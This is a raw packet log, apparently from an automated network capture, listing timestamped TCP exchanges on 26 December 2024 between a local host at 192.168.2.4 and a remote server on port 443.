                                                                                        Dec 26, 2024 11:52:08.037942886 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.037970066 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.038001060 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.038009882 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.038055897 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.040182114 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.042417049 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.042463064 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.042470932 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.044661045 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.044709921 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.044717073 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.047084093 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.047133923 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.047141075 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.049808979 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.049855947 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.049864054 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.051522970 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.051570892 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.051578999 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.053800106 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.053845882 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.053855896 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.058331013 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.058377981 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.058386087 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.060534000 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.060576916 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.060585022 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.062793970 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.062839031 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.062846899 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.064701080 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.064745903 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.064754009 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.068582058 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.068629026 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.068635941 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.070297956 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.070337057 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.070344925 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.071453094 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.071499109 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.071506023 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.080346107 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.080393076 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.080400944 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.081209898 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.081255913 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.081263065 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.090423107 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.090468884 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.090476990 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.091336012 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.091376066 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.091382980 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.099670887 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.099719048 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.099726915 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.100646019 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.100704908 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.100712061 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.108644009 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.108697891 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.108705044 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.109563112 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.109606981 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.109613895 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.117762089 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.117805004 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.117811918 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.118746042 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.118787050 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.118793964 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.126280069 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.126327991 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.126334906 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.127374887 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.127420902 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.127428055 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.134577036 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.134622097 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.134628057 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.135349035 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.135392904 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.135400057 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.142829895 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.142874956 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.142882109 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.143750906 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.143791914 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.143800020 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.149175882 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.149218082 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.149224997 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.150161982 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.150208950 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.150216103 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.155518055 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.155540943 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.155570030 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.155579090 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.155620098 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.156387091 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.161850929 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.161874056 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.161900997 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.161910057 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.161955118 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.162868023 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.188496113 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.188520908 CET44349732142.250.181.97192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 26, 2024 11:52:08.188563108 CET | 49732 | 443 | 192.168.2.4 | 142.250.181.97
Dec 26, 2024 11:52:08.188574076 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.188623905 CET | 49732 | 443 | 192.168.2.4 | 142.250.181.97
Dec 26, 2024 11:52:08.190926075 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.191742897 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.191788912 CET | 49732 | 443 | 192.168.2.4 | 142.250.181.97
Dec 26, 2024 11:52:08.191797972 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.193465948 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.193515062 CET | 49732 | 443 | 192.168.2.4 | 142.250.181.97
Dec 26, 2024 11:52:08.193523884 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.239006042 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.239083052 CET | 49732 | 443 | 192.168.2.4 | 142.250.181.97
Dec 26, 2024 11:52:08.239094019 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.240299940 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.240350962 CET | 49732 | 443 | 192.168.2.4 | 142.250.181.97
Dec 26, 2024 11:52:08.240360022 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.241563082 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.241607904 CET | 49732 | 443 | 192.168.2.4 | 142.250.181.97
Dec 26, 2024 11:52:08.241616011 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.242949009 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.242994070 CET | 49732 | 443 | 192.168.2.4 | 142.250.181.97
Dec 26, 2024 11:52:08.243000984 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.244173050 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.244216919 CET | 49732 | 443 | 192.168.2.4 | 142.250.181.97
Dec 26, 2024 11:52:08.244225025 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.245493889 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.245543957 CET | 49732 | 443 | 192.168.2.4 | 142.250.181.97
Dec 26, 2024 11:52:08.245551109 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.247937918 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.247984886 CET | 49732 | 443 | 192.168.2.4 | 142.250.181.97
Dec 26, 2024 11:52:08.247992992 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.249155998 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.249203920 CET | 49732 | 443 | 192.168.2.4 | 142.250.181.97
Dec 26, 2024 11:52:08.249212027 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.250415087 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.250446081 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.250457048 CET | 49732 | 443 | 192.168.2.4 | 142.250.181.97
Dec 26, 2024 11:52:08.250463963 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.250510931 CET | 49732 | 443 | 192.168.2.4 | 142.250.181.97
Dec 26, 2024 11:52:08.251713037 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.252937078 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.252980947 CET | 49732 | 443 | 192.168.2.4 | 142.250.181.97
Dec 26, 2024 11:52:08.252989054 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.254292011 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.254338980 CET | 49732 | 443 | 192.168.2.4 | 142.250.181.97
Dec 26, 2024 11:52:08.254347086 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.255537033 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.255583048 CET | 49732 | 443 | 192.168.2.4 | 142.250.181.97
Dec 26, 2024 11:52:08.255594015 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.256815910 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.256861925 CET | 49732 | 443 | 192.168.2.4 | 142.250.181.97
Dec 26, 2024 11:52:08.256869078 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.259176016 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.259222031 CET | 49732 | 443 | 192.168.2.4 | 142.250.181.97
Dec 26, 2024 11:52:08.259228945 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.260349035 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.260389090 CET | 49732 | 443 | 192.168.2.4 | 142.250.181.97
Dec 26, 2024 11:52:08.260400057 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.261567116 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.261611938 CET | 49732 | 443 | 192.168.2.4 | 142.250.181.97
Dec 26, 2024 11:52:08.261619091 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.262732983 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.262778044 CET | 49732 | 443 | 192.168.2.4 | 142.250.181.97
Dec 26, 2024 11:52:08.262785912 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.263942003 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.263988018 CET | 49732 | 443 | 192.168.2.4 | 142.250.181.97
Dec 26, 2024 11:52:08.263995886 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.276120901 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.276149988 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.276175022 CET | 49732 | 443 | 192.168.2.4 | 142.250.181.97
Dec 26, 2024 11:52:08.276186943 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.276230097 CET | 49732 | 443 | 192.168.2.4 | 142.250.181.97
Dec 26, 2024 11:52:08.276504993 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.277040958 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.277082920 CET | 49732 | 443 | 192.168.2.4 | 142.250.181.97
Dec 26, 2024 11:52:08.277095079 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.290776968 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.290818930 CET | 49732 | 443 | 192.168.2.4 | 142.250.181.97
Dec 26, 2024 11:52:08.290827036 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.291326046 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.291368008 CET | 49732 | 443 | 192.168.2.4 | 142.250.181.97
Dec 26, 2024 11:52:08.291374922 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.292215109 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.292258978 CET | 49732 | 443 | 192.168.2.4 | 142.250.181.97
Dec 26, 2024 11:52:08.292265892 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.302166939 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.302211046 CET | 49732 | 443 | 192.168.2.4 | 142.250.181.97
Dec 26, 2024 11:52:08.302222967 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.302512884 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.302556992 CET | 49732 | 443 | 192.168.2.4 | 142.250.181.97
Dec 26, 2024 11:52:08.302563906 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.303441048 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.303488016 CET | 49732 | 443 | 192.168.2.4 | 142.250.181.97
Dec 26, 2024 11:52:08.303494930 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.319243908 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.319289923 CET | 49732 | 443 | 192.168.2.4 | 142.250.181.97
Dec 26, 2024 11:52:08.319303036 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.319644928 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.319704056 CET | 49732 | 443 | 192.168.2.4 | 142.250.181.97
Dec 26, 2024 11:52:08.319710970 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.321248055 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.321295977 CET | 49732 | 443 | 192.168.2.4 | 142.250.181.97
Dec 26, 2024 11:52:08.321302891 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.332071066 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.332117081 CET | 49732 | 443 | 192.168.2.4 | 142.250.181.97
Dec 26, 2024 11:52:08.332123995 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.332328081 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.332370043 CET | 49732 | 443 | 192.168.2.4 | 142.250.181.97
Dec 26, 2024 11:52:08.332384109 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.333287001 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.333332062 CET | 49732 | 443 | 192.168.2.4 | 142.250.181.97
Dec 26, 2024 11:52:08.333339930 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.345328093 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.345377922 CET | 49732 | 443 | 192.168.2.4 | 142.250.181.97
Dec 26, 2024 11:52:08.345386028 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.345567942 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.345613003 CET | 49732 | 443 | 192.168.2.4 | 142.250.181.97
Dec 26, 2024 11:52:08.345619917 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.347327948 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.347371101 CET | 49732 | 443 | 192.168.2.4 | 142.250.181.97
Dec 26, 2024 11:52:08.347378969 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.355185986 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.355226040 CET | 49732 | 443 | 192.168.2.4 | 142.250.181.97
Dec 26, 2024 11:52:08.355233908 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.355775118 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.355823040 CET | 49732 | 443 | 192.168.2.4 | 142.250.181.97
Dec 26, 2024 11:52:08.355829954 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.357253075 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.357296944 CET | 49732 | 443 | 192.168.2.4 | 142.250.181.97
Dec 26, 2024 11:52:08.357305050 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.366172075 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.366214991 CET | 49732 | 443 | 192.168.2.4 | 142.250.181.97
Dec 26, 2024 11:52:08.366223097 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.367675066 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.367706060 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.367719889 CET | 49732 | 443 | 192.168.2.4 | 142.250.181.97
Dec 26, 2024 11:52:08.367727041 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.367767096 CET | 49732 | 443 | 192.168.2.4 | 142.250.181.97
Dec 26, 2024 11:52:08.368297100 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.373878956 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.373908997 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.373922110 CET | 49732 | 443 | 192.168.2.4 | 142.250.181.97
Dec 26, 2024 11:52:08.373929977 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.373974085 CET | 49732 | 443 | 192.168.2.4 | 142.250.181.97
Dec 26, 2024 11:52:08.374032974 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.375581980 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.375631094 CET | 49732 | 443 | 192.168.2.4 | 142.250.181.97
Dec 26, 2024 11:52:08.375638962 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.401628971 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.401675940 CET | 49732 | 443 | 192.168.2.4 | 142.250.181.97
Dec 26, 2024 11:52:08.401685953 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.402822971 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.402873039 CET | 49732 | 443 | 192.168.2.4 | 142.250.181.97
Dec 26, 2024 11:52:08.402879953 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.403686047 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.403731108 CET | 49732 | 443 | 192.168.2.4 | 142.250.181.97
Dec 26, 2024 11:52:08.403738022 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.449335098 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.449404955 CET | 49732 | 443 | 192.168.2.4 | 142.250.181.97
Dec 26, 2024 11:52:08.449414015 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.450208902 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.450257063 CET | 49732 | 443 | 192.168.2.4 | 142.250.181.97
Dec 26, 2024 11:52:08.450264931 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.451117992 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.451162100 CET | 49732 | 443 | 192.168.2.4 | 142.250.181.97
Dec 26, 2024 11:52:08.451168060 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.451998949 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.452044010 CET | 49732 | 443 | 192.168.2.4 | 142.250.181.97
Dec 26, 2024 11:52:08.452052116 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.452976942 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.453022003 CET | 49732 | 443 | 192.168.2.4 | 142.250.181.97
Dec 26, 2024 11:52:08.453031063 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.453995943 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.454042912 CET | 49732 | 443 | 192.168.2.4 | 142.250.181.97
Dec 26, 2024 11:52:08.454050064 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.454812050 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.454858065 CET | 49732 | 443 | 192.168.2.4 | 142.250.181.97
Dec 26, 2024 11:52:08.454864979 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.455651999 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.455705881 CET | 49732 | 443 | 192.168.2.4 | 142.250.181.97
Dec 26, 2024 11:52:08.455713987 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.457407951 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.457453012 CET | 49732 | 443 | 192.168.2.4 | 142.250.181.97
Dec 26, 2024 11:52:08.457459927 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.458223104 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.458270073 CET | 49732 | 443 | 192.168.2.4 | 142.250.181.97
Dec 26, 2024 11:52:08.458277941 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.459105968 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.459151983 CET | 49732 | 443 | 192.168.2.4 | 142.250.181.97
Dec 26, 2024 11:52:08.459157944 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.461110115 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
